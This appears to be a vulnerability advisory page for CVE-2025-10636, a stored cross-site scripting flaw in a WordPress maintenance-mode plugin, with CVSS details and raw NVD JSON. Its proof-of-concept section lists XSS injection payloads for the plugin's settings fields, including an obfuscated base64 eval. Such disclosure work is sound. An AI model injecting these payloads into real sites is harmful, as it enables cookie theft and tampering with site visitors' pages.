Security Vulnerability Report
CVE-2025-10636 CVSS 3.5 LOW

CVE-2025-10636

Published: 2025-10-30 06:15:44
Last Modified: 2026-04-15 00:35:42

Description

The NS Maintenance Mode for WP WordPress plugin through 1.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

NS Maintenance Mode for WP WordPress plugin <= 1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- Stored XSS PoC for CVE-2025-10636 -->
<!-- This PoC demonstrates the vulnerability in NS Maintenance Mode plugin -->
<!-- Step 1: As admin, go to plugin settings page -->
<!-- Step 2: Inject XSS payload in settings fields -->
<!-- Example payloads for different settings fields: -->
<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert(document.domain)>
<!-- Example: Inject in maintenance mode title/description field -->
<!-- Replace normal text with: -->
<svg/onload=eval(atob('YWxlcnQoJ1hTUyBNT0RFIERldGVjdGVkIScpOw=='))>
<!-- After saving, when admin revisits settings page, JS executes -->

References

https://wpscan.com/vulnerability/a1ab1d82-108e-4f66-9d06-5036cde9678a/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10636", "sourceIdentifier": "[email protected]", "published": "2025-10-30T06:15:43.577", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The NS Maintenance Mode for WP WordPress plugin through 1.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 2.5}]}, "references": [{"url": "https://wpscan.com/vulnerability/a1ab1d82-108e-4f66-9d06-5036cde9678a/", "source": "[email protected]"}]}}